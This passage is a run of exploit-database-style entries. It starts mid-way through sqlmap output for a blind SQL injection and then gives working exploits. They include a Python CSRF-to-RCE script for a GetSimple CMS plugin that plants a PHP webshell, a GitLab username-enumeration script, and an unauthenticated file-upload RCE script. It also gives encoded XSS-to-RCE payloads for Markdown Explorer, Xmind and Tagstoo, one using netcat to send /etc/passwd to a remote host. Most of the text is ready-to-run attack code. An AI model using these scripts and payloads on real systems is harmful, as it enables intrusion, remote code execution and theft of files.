gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=vuukl0gemht1iiq7lmptu7npoe Connection: close voter=as&password=as&login= ``` Sqlmap output ``` python3 sqlmap.py --dbms=mysql --batch 
--level=1 --risk=3 -r /Users/sheerazali/Documents/wpcve/voter.req -p voter ___ __H__ ___ ___[)]_____ ___ ___ {1.5.4.7#dev} |_ -| . [(] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 07:50:56 /2021-05-02/ [07:50:56] [INFO] parsing HTTP request from '/Users/sheerazali/Documents/wpcve/voter.req' [07:50:57] [INFO] testing connection to the target URL got a 302 redirect to 'http://10.129.139.200:80/index.php'. Do you want to follow? [Y/n] Y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y sqlmap resumed the following injection point(s) from stored session: --- Parameter: voter (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: voter=as' AND (SELECT 2487 FROM (SELECT(SLEEP(5)))WYpt) AND 'hBVQ'='hBVQ&password=as&login= --- [07:50:57] [INFO] testing MySQL do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y [07:51:08] [INFO] confirming MySQL [07:51:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [07:51:19] [INFO] adjusting time delay to 1 second due to good response times [07:51:19] [INFO] the back-end DBMS is MySQL web application technology: PHP 7.3.27, Apache 2.4.46 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [07:51:19] [INFO] fetched data logged to text files under '/Users/sheerazali/.local/share/sqlmap/output/10.129.139.200' [*] ending @ 07:51:19 /2021-05-02/ ```
  14. # Exploit Title: GetSimple CMS Custom JS 0.1 - CSRF to XSS to RCE # Exploit Author: Bobby Cooke (boku) & Abhishek Joshi # Date: 30/04/201 # Vendor Homepage: http://get-simple.info # Software Link: http://get-simple.info/download/ & http://get-simple.info/extend/plugin/custom-js/1267/ # Vendor: 4Enzo # Version: v0.1 # Tested against Server Host: Windows 10 Pro + XAMPP # Tested against Client Browsers: Firefox (Linux & Windows) & Internet Explorer # Vulnerability Description: # The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website. # Full Disclosure & MITRE CVE Tracking: github.com/boku7/gsCMS-CustomJS-Csrf2Xss2Rce # CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H # CVSS Base Score: 9.6 import argparse,requests from http.server import BaseHTTPRequestHandler, HTTPServer from colorama import (Fore as F, Back as B, Style as S) from threading import Thread from time import sleep FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT def bullet(char,color): C=FB if color == 'B' else FR if color == 'R' else FG return SB+C+'['+ST+SB+char+SB+C+']'+ST+' ' info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G') class theTHREADER(object): def __init__(self, interval=1): self.interval = interval thread = Thread(target=self.run, args=()) thread.daemon = True thread.start() def run(self): run() def webshell(target): try: websh = "{}/webshell.php".format(target,page) term = "{}{}PWNSHELL{} > {}".format(SB,FR,FB,ST) welcome = ' {}{}]{}+++{}[{}========>{} HelloFriend {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST) print(welcome) while True: specialmove = input(term) command = 
{'FierceGodKick': specialmove} r = requests.post(websh, data=command, verify=False) status = r.status_code if status != 200: r.raise_for_status() response = r.text print(response) except: pass def xhrRcePayload(): payload = 'var e=function(i){return encodeURIComponent(i);};' payload += 'var gt = decodeURIComponent("%3c");' payload += 'var lt = decodeURIComponent("%3e");' payload += 'var h="application/x-www-form-urlencoded";' payload += 'var u="/admin/theme-edit.php";' payload += 'var xhr1=new XMLHttpRequest();' payload += 'var xhr2=new XMLHttpRequest();' payload += 'xhr1.onreadystatechange=function(){' payload += 'if(xhr1.readyState==4 && xhr1.status==200){' payload += 'r=this.responseXML;' payload += 'nVal=r.querySelector("#nonce").value;' payload += 'eVal=r.forms[1][2].defaultValue;' payload += 'xhr2.open("POST",u,true);' payload += 'xhr2.setRequestHeader("Content-Type",h);' payload += 'payload=e(gt+"?php echo shell_exec($_REQUEST[solarflare]) ?"+lt);' payload += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";' payload += 'xhr2.send(params);' payload += '}};' payload += 'xhr1.open("GET",u,true);' payload += 'xhr1.responseType="document";' payload += 'xhr1.send();' return payload def csrfPayload(): payload = '<html><body>' payload += '<form action="'+target+'/admin/load.php?id=CustomJSPlugin" method="POST">' payload += '<input type="hidden" name="customjs_url_content" value="">' payload += '<input type="hidden" name="customjs_js_content" value="'+xhrRcePayload()+'">' payload += '<input type="hidden" name="submit" value="Save Settings">' payload += '<input type="submit" value="Submit request">' payload += '</form></body></html>' return payload class S(BaseHTTPRequestHandler): def do_GET(self): victim = self.client_address victim = "{}:{}".format(victim[0],victim[1]) print("{}{} connected to Malicious CSRF Site!".format(ok,victim)) print('{}Waiting for admin to view a CMS webpage & trigger the XSS XHR -> RCE 
payload..'.format(info)) self.wfile.write("{}".format(csrfPayload()).encode('utf-8')) def run(server_class=HTTPServer, handler_class=S, port=80): server_address = ('', port) httpd = server_class(server_address, handler_class) print('{}Hosting CSRF attack & listening for admin to connect..'.format(info)) try: httpd.serve_forever() except KeyboardInterrupt: pass httpd.server_close() print('Stopping httpd...') def tryUploadWebshell(target,page): try: blind = target+page # The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt) webshUpload = {'solarflare': "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"} requests.post(url=blind, data=webshUpload, verify=False) except: pass def checkWebshell(target): try: websh = "{}/webshell.php".format(target) capsule = {'FierceGodKick':'pwnt?'} resp = requests.post(url=websh, data=capsule, verify=False) return resp.status_code except: pass def sig(): SIG = SB+FY+" .-----.._ ,--. "+FB+" ___ "+FY+" ___ _____ _____ _ _ _____ \n" SIG += FY+" | .. > ___ | | .--. "+FB+" / \\ "+FY+" |_ | _ / ___| | | |_ _| \n" SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __ "+FB+" \\ O / "+FY+" | | | | \\ `--.| |_| | | | \n" SIG += FY+" | </ "+FR+"* * *"+FY+" \ / \\/ \\ "+FB+" / _ \\/\\ "+FY+" | | | | |`--. 
\\ _ | | | \n" SIG += FY+" | |> ) "+FR+" * *"+FY+" / \\ \\"+FB+" ( (_> < "+FY+"/\\__/ | \\_/ /\\__/ / | | |_| |_ \n" SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\ "+FB+"\\___/\\/"+FY+" \\____/ \\___/\\____/\\_| |_/\\___/\n" SIG += FY+" __"+FR+"linkedin.com/in/bobby-cooke/"+FY+"_____ "+" __"+FR+"linkedin.com/in/reverse-shell/"+FY+"\n"+ST return SIG def argsetup(): about = SB+FB+' The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website.\n'+ST about += SB+FC+' CVSS Base Score'+FT+':'+FR+' 9.6 '+FT+'|'+FC+' CVSS v3.1 Vector'+FT+':'+FR+' AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+FC parser = argparse.ArgumentParser(description=about, formatter_class=argparse.RawTextHelpFormatter) desc1 = ST+FC+'Routable domain name of the target GetSimple CMS instance'+SB parser.add_argument('Target',type=str,help=desc1) desc2 = ST+FC+'Path to the public page which implements the CMS theme'+ST parser.add_argument('PublicPage',type=str,help=desc2) args = parser.parse_args() return args if __name__ == '__main__': header = SB+FR+' GetSimple CMS - Custom JS Plugin Exploit\n' header += SB+FB+' CSRF '+FT+'->'+FB+' Stored XSS '+FT+'->'+FB+' XHR PHP Code Injection '+FT+'->'+FB+' RCE\n'+ST header += SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke & Abhishek Joshi\n'+ST print(header) args = argsetup() target = args.Target page = args.PublicPage print(sig()) theTHREADER() pwnt = checkWebshell(target) if pwnt != 200: while pwnt != 200: sleep(3) tryUploadWebshell(target,page) sleep(2) pwnt = checkWebshell(target) print("{} A wild webshell appears!".format(ok)) webshell(target)
  15. # Exploit Title: GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration # Date: 4/29/2021 # Exploit Author: @4D0niiS [https://github.com/4D0niiS] # Vendor Homepage: https://gitlab.com/ # Version: 13.10.3 # Tested on: Kali Linux 2021.1 INFO: An unauthenticated attacker can remotely enumerate the existence of different usernames in her victim's GitLab CE instance by leveraging its sign_up page [Ex: http://gitlab.local/users/sign_up]. DISCLAIMER: Do not test this method against GitLab.com. Also keep in mind that this PoC is meant only for educational purposes and ethical use. Testing it against systems that you do not own or do not have explicit permission to test is entirely at your own risk. STEPS: The required steps for this purpose are as follows: 1- Fill in the "username" field on the sign_up form with any value and confirm that the form validates the entered username. 2- Repeat step 1 (with username: testuser) while intercepting the resulting request with a proxy tool such as Burp Suite. You should see a request similar to the one below: ---------------------------------------------------------------------------------------------------------------------------------------------------------------- GET /users/testuser/exists HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/users/sign_up X-CSRF-Token: <some value> X-Requested-With: XMLHttpRequest Connection: close Cookie: experimentation_subject_id=<some value>; known_sign_in=<some value>; _gitlab_session=<some value> ---------------------------------------------------------------------------------------------------------------------------------------------------------------- * Note that the tested username (testuser) is part of the URI. 3- Send this request to Burp's Intruder and run a brute-force attack on it by replacing "testuser" in the 
URI as the enumeration parameter. 4- Valid usernames can be found by looking for the statement {"exists":true} in responses. On the other hand, invalid ones give {"exists":false} in responses. So you can find valid users by analyzing the responses. Take the following examples: -------------------------------------------The following response belongs to a valid user ------------------------------------------ HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Apr 2021 09:52:44 GMT Content-Type: application/json; charset=utf-8 Content-Length: 15 Connection: close Cache-Control: max-age=0, private, must-revalidate Etag: W/"8063e5a51719c58189c7d5209a5f37b3" Page-Title: GitLab Set-Cookie: _gitlab_session=<some value>; path=/; expires=Mon, 19 Apr 2021 11:52:44 GMT; HttpOnly X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: DENY X-Gitlab-Feature-Category: users X-Permitted-Cross-Domain-Policies: none X-Request-Id: 01F3MRQTB94MT0HQXE0NMEMP7F X-Runtime: 0.221557 X-Ua-Compatible: IE=edge X-Xss-Protection: 1; mode=block Strict-Transport-Security: max-age=31536000 Referrer-Policy: strict-origin-when-cross-origin {"exists":true} -------------------------------------------The following response belongs to an invalid user ------------------------------------------ HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Apr 2021 09:55:34 GMT Content-Type: application/json; charset=utf-8 Content-Length: 16 Connection: close Cache-Control: max-age=0, private, must-revalidate Etag: W/"e39f603a5ebcff23859d200f9c9dc20f" Page-Title: GitLab Set-Cookie: _gitlab_session=<some value>; path=/; expires=Mon, 19 Apr 2021 11:55:34 GMT; HttpOnly X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: DENY X-Gitlab-Feature-Category: users X-Permitted-Cross-Domain-Policies: none X-Request-Id: 01F3MRX0GJGG1DE8RPKPCVC7Q0 X-Runtime: 0.033046 X-Ua-Compatible: IE=edge X-Xss-Protection: 1; mode=block Strict-Transport-Security: max-age=31536000 Referrer-Policy: 
strict-origin-when-cross-origin {"exists":false}
  16. # Exploit Title: GitLab Community Edition (CE) 13.10.3 - User Enumeration # Date: 4/29/2021 # Exploit Author: @4D0niiS [https://github.com/4D0niiS] # Vendor Homepage: https://gitlab.com/ # Version: 13.10.3 # Tested on: Kali Linux 2021.1 #!/bin/bash #Colors RED='\033[38;5;196m' GREEN='\e[38;5;47m' NC='\033[0m' BOLD='\e[1m' PINK='\e[38;5;198m' Italic='\e[3m' BBlue='\e[44m' YELLOW='\033[0;33m' clear echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" echo -e " ${BBlue}${BOLD}GitLab User Enumeration Script${NC}" echo -e " ${BOLD}Version 1.0${NC}\n" echo -e "${BOLD}${PINK}Description: ${NC}It prints out the usernames that exist in your victim's GitLab CE instance\n" echo -e "${BOLD}${PINK}Disclaimer: ${NC}${Italic}Do not run this script against ${BOLD}GitLab.com!${NC}${Italic} Also keep in mind that this PoC is meant only" echo -e "for educational purpose and ethical use. Running it against systems that you do not own or have the" echo -e "right permission is totally on your own risk.\n${NC}" echo -e "${BOLD}${PINK}Author:${NC}${BOLD} @4DoniiS${NC}${Italic} [https://github.com/4D0niiS]${NC}" echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" echo "" echo "" # Usage usage() { echo -e "${YELLOW}usage: ./gitlab_user_enum.sh --url <URL> --userlist <Username Wordlist>${NC}\n" echo -e "${Italic}PARAMETERS:${NC}" echo -e "-------------" echo -e "-u/--url The URL of your victim's GitLab instance" echo -e "--userlist Path to a username wordlist file (one per line)" echo -e "-h/--help Show this help message and exit" echo -e "\n" echo -e "${Italic}Example:${NC}" echo -e "-------------" echo -e "./gitlab_user_enum.sh --url http://gitlab.local/ --userlist /home/user/usernames.txt" } #check for params args=("$@") URL="" user_list="" for (( i=0; i < $#; i++)) { case ${args[$i]} in --url | -u) #GitLab's URL URL=${args[$((i+1))]} ;; --userlist) #Username 
wordlist user_list=${args[$((i+1))]} ;; -h | --help | "") #Help Menu usage exit 0 ;; esac } ## checking the mandatory parameter (URL) if [ -z "$URL" ] then usage echo "" echo -e "${RED}${BOLD}The URL of your GitLab target (--url) is missing. ${NC}" exit 0 fi # User Enumeration Function enumeration(){ while IFS= read -r line do echo "LOOP" HTTP_Code=$( curl -s -o /dev/null -w "%{http_code}" $URL/$line) echo $HTTP_Code #echo "\n" if [ $HTTP_Code -eq 200 ] then echo -e "${GREEN}${BOLD}[+]${NC} The username ${GREEN}${BOLD}$line ${NC}exists!" #check the connection elif [ $HTTP_Code -eq 000 ] then echo -e "${BOLD}${RED}[!]${NC} The target is unreachable. Please make sure that you entered target's URL correctly and you have connection with it!" exit 0 fi done < "$user_list" } # Main enumeration
  17. # Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated) # Date: 2021-05-04 # Exploit Author: argenestel # Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code # Version: 1.0 # Tested on: Debian 10 import requests import time #change the url to the site running the vulnerable system url="http://127.0.0.1:4000" #burp proxy proxies = { "http": "http://127.0.0.1:8080", } #payload payload='<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>' #the upload point insert_url=url+"/inserty.php" def fill_details(): global payload global shellend global shellstart print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload") #time start shellstart=int(time.time()) #print(shellstart) files = {'file':('shell.php',payload, 'image/png', {'Content-Disposition': 'form-data'} ) } data = { "company_name":"some", "first_name":"some", "last_name":"some", "email":"[email protected]", "gender":"Male", "insert_button":"Apply", "terms":"on" } r = requests.post(insert_url, data=data, files=files) if r.status_code == 200: print("Exploited Intern System Successfully...") shellend = int(time.time()) #print(shellend) shell() else: print("Exploit Failed") def shell(): for shellname in range(shellstart, shellend+1): shellstr=str(shellname) shell_url=url+"/upload/"+shellstr+"_shell.php" r = requests.get(shell_url) if r.status_code == 200: shell_url=url+"/upload/"+shellstr+"_shell.php" break r = requests.get(shell_url) if r.status_code == 200: print("Shell Starting...") while True: cmd=input("cmd$ ") r = requests.get(shell_url+"?cmd="+cmd) print(r.text) else: print("File Name Error") fill_details()
  18. # Exploit Title: Markdown Explorer 0.1.1 - XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://github.com/jersou/markdown-explorer # Version: 0.1.1 # Tested on: Windows, Linux, MacOs # Software Description: Easily explore, view and edit markdown documentation of a file tree. If your projects documentation is written in Markdown, with md files dispersed throughout your project tree, Markdown Explorer displays md files in a tree structure, and it allows filtering by file name or by file content. Just drop a folder on the window (or click on the folder icon on top left) to show the Markdown documentation of this folder. Then, explore the tree on the left, and toggle view/edit mode on md file with the button on the top right. # Vulnerability Description: The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the remote attacker to get remote execution on the computer. #Proof https://imgur.com/a/w4bcPWs # Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) [<audio src=x onerror=writeln(String.fromCharCode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http://)
  19. # Exploit Title: Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting # Date: 2021-05-04 # Exploit Author: strider # Software Link: https://github.com/savsofts/savsoftquiz_v5 # Vendor: https://savsoftquiz.com # Version: 5.0 # Tested on: Ubuntu 20.04 LTS / Kali Linux ====================================[Description]==================================== The vulnerability is found on the user settings page, where the user can change their name and login credentials. It is possible to inject HTML/JS into these fields, which is executed after pressing submit. ====================================[Proof of Concept]==================================== If you have installed this software, create a new user, or use the default user shown in the install description. test-link: http://192.168.1.109/index.php/user/edit_user/<userid> step1) Log in to an account step2) Click your account name at the top right and navigate to "My Account" step3) Insert "><script>alert(document.cookie);</script> into the fields and hit submit boom!
  20. # Exploit Title: Xmind 2020 - XSS to RCE # Exploit Author: TaurusOmar # Date: May 4th, 2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://www.xmind.net/ # Version: 2020 # Tested on: Windows, Linux, MacOs # Software Description: XMind, a full-featured mind mapping and brainstorming tool, designed to generate ideas, inspire creativity, brings efficiency both in work and life. Millions and millions of WFH people love it. Many great products start with a small idea. Mind map can really be useful at the beginning of a project. Use it to record every idea in the meeting, you might be surprised by the difference and achievement it makes in the long run. # Vulnerability Description: The software allows payloads to be stored in files or as custom header titles; once the malicious code is entered, the payload is executed when the victim moves the mouse or clicks. The attacker can send a malicious file containing the payload; when this file is opened, the chain executes successfully and gives the remote attacker remote code execution on the computer. 
#Proof video https://imgur.com/a/t96Nxo5 # Payload 2: exec(/etc/passwd) #Decode Payload <script> const { spawn } = require("child_process"); const cat = spawn("cat", ["/etc/passwd"]); cat.stdout.on("data", data => { alert(`stdout: ${data}`); });</script> #Encode Payload <img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,99,111,110,115,116,32,123,32,115,112,97,119,110,32,125,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,59,10,99,111,110,115,116,32,99,97,116,32,61,32,115,112,97,119,110,40,34,99,97,116,34,44,32,91,34,47,101,116,99,47,112,97,115,115,119,100,34,93,41,59,10,99,97,116,46,115,116,100,111,117,116,46,111,110,40,34,100,97,116,97,34,44,32,100,97,116,97,32,61,62,32,123,10,32,32,32,32,97,108,101,114,116,40,96,115,116,100,111,117,116,58,32,36,123,100,97,116,97,125,96,41,59,10,125,41,59,60,47,115,99,114,105,112,116,62))> # Payload 2: exec(calc) #Decode Payload <script> var Process = process.binding('process_wrap').Process; var proc = new Process(); proc.onexit = function(a,b) {}; var env = process.env; var env_ = []; for (var key in env) env_.push(key+'='+env[key]); proc.spawn({file:'/usr/bin/gnome-calculator',cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]}); </script> #Encode Payload <img src=x 
onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))> # File Malicious.json Payload [{"id":"5609f1388fd8c10e8f8798f104","class":"sheet","title":"Map 1","rootTopic":{"id":"b9aa22deba98b3b20c7ac8aca2","class":"topic","title":"\">'><img src=x 
onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,108,101,116,32,123,32,115,112,97,119,110,32,125,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,59,10,108,101,116,32,108,115,32,61,32,115,112,97,119,110,40,34,108,115,34,44,32,91,34,45,108,97,34,93,41,59,10,108,115,46,115,116,100,111,117,116,46,111,110,40,34,100,97,116,97,34,44,32,100,97,116,97,32,61,62,32,123,10,32,32,32,32,97,108,101,114,116,40,96,115,116,100,111,117,116,58,32,36,123,100,97,116,97,125,96,41,59,125,41,59,60,47,115,99,114,105,112,116,62,10,10))>","structureClass":"org.xmind.ui.map.unbalanced","children":{"attached":[{"id":"b58888b5ceebbf0e68dada0656","title":"Main Topic 1","titleUnedited":true},{"id":"193b56735e689ae86a01d91513","title":"Main Topic 2","titleUnedited":true},{"id":"67ddbcb1-85c9-4478-a0aa-580e9fdcd971","title":"Main Topic 3","titleUnedited":true}]},"extensions":[{"content":[{"content":"3","name":"right-number"}],"provider":"org.xmind.ui.map.unbalanced"}]},"theme":{"id":"c669ec6d4d48895260d968fc99","importantTopic":{"type":"topic","properties":{"fo:font-weight":"bold","fo:color":"#2b2b2b","svg:fill":"#FFDC34"}},"minorTopic":{"type":"topic","properties":{"fo:font-weight":"bold","fo:color":"#2b2b2b","svg:fill":"#AB9738"}},"expiredTopic":{"type":"topic","properties":{"fo:font-style":"italic","fo:text-decoration":" 
line-through"}},"centralTopic":{"type":"topic","styleId":"9a13b7d6-cd05-44c3-b903-6c3a50edc46e","properties":{"shape-class":"org.xmind.topicShape.roundedRect","svg:fill":"#1B1B1D","fo:font-family":"Montserrat","fo:font-weight":"600","fo:font-style":"normal","line-width":"3","line-color":"#292929","border-line-width":"0"}},"map":{"type":"map","styleId":"f0e1f9bb-a8f5-486a-a70a-b72b2b6560d3","properties":{"svg:fill":"#000000"}},"subTopic":{"type":"topic","styleId":"9ea90eed-1da0-4c93-bac4-2085e16a0faf","properties":{"fo:font-family":"Montserrat","svg:fill":"#636366","shape-class":"org.xmind.topicShape.roundedRect","fo:font-size":"14pt","fo:text-align":"left","border-line-width":"0","fo:color":"#FFFFFF"}},"mainTopic":{"type":"topic","styleId":"42065f7f-018c-4eb9-9dc7-3a7bbf464915","properties":{"fo:font-family":"Montserrat","svg:fill":"#3A3A3C","border-line-width":"0","fo:font-weight":"600","fo:font-style":"normal","fo:font-size":"18pt","fo:text-align":"left","fo:color":"#FFFFFF","line-width":"2"}},"summaryTopic":{"type":"topic","styleId":"c8f4c32b-2607-4fae-bb85-b8736039e941","properties":{"fo:font-family":"Montserrat","svg:fill":"#8E8E93","fo:font-weight":"500","fo:font-style":"normal","line-color":"#292929","border-line-width":"0"}},"calloutTopic":{"type":"topic","styleId":"6f8bd667-fb82-4d0d-899f-05dc76c5945e","properties":{"fo:font-family":"Montserrat","svg:fill":"#8E8E93","fo:font-size":"14pt","fo:font-weight":"500","fo:font-style":"normal"}},"floatingTopic":{"type":"topic","styleId":"c9509bc2-2641-4f5f-8b38-e62c14c907f9","properties":{"fo:font-family":"Montserrat","border-line-width":"0","fo:font-weight":"500","fo:font-style":"normal","line-width":"2","line-color":"#292929"}},"boundary":{"type":"boundary","styleId":"0d7cf959-3b54-4849-88e1-cc0fc8c60341","properties":{"svg:fill":"#545455","shape-class":"org.xmind.boundaryShape.roundedRect","line-color":"#5D5D60","fo:font-weight":"500","fo:font-style":"normal","fo:color":"#FFFFFF","fo:font-size":"13pt","fo:font-fa
mily":"Montserrat"}},"relationship":{"type":"relationship","styleId":"57da2f8e-3f8d-47ee-a802-93023fc802c1","properties":{"line-color":"#8E8E93","line-width":"2","fo:font-weight":"500","fo:font-style":"normal","fo:font-family":"Montserrat","fo:color":"#FFFFFF","fo:font-size":"13pt"}},"summary":{"type":"summary","styleId":"ddeb9d94-1678-4129-8796-42b036e08dd2","properties":{"line-color":"#5A5A5A"}}},"topicPositioning":"fixed"}]
  21. # Exploit Title: Tagstoo 2.0.1 - Stored XSS to RCE # Exploit Author: TaurusOmar # Date: 04/05/2021 # CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H # Risk: High (8.8) # Vendor Homepage: https://tagstoo.sourceforge.io/ # Version: v2.0.1 # Tested on: Windows, Linux, MacOs # Software Description: Software to tag folders and files, with multimedia and epubs preview. You can export data with the tagging information to a file, as backup or to import it in any computer. # Vulnerability Description: The software allows you to store payloads in the form of files or custom tags, once the malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the the remote attacker to get remote execution on the computer or directly open the folder in the program. # Proof video https://imgur.com/a/smeAjaW # Payload 1: exec(calc) #Decode Payload <script> var Process = process.binding('process_wrap').Process; var proc = new Process(); proc.onexit = function(a,b) {}; var env = process.env; var env_ = []; for (var key in env) env_.push(key+'='+env[key]); proc.spawn({file:'/usr/bin/gnome-calculator',cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]}); </script> #Encode Payload <img src=x 
onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))> # Payload 2: exec(netcat remote stolen file => /etc/passwd) #Decode Payload <audio src=x onerror="const exec= require('child_process').exec; exec('nc -w 3 192.168.111.129 1337 < /etc/passwd', (e, stdout, stderr)=> { if (e instanceof Error) { console.error(e); throw e; } console.log('stdout ', stdout); console.log('stderr ', stderr);}); alert('1')"> #Encode 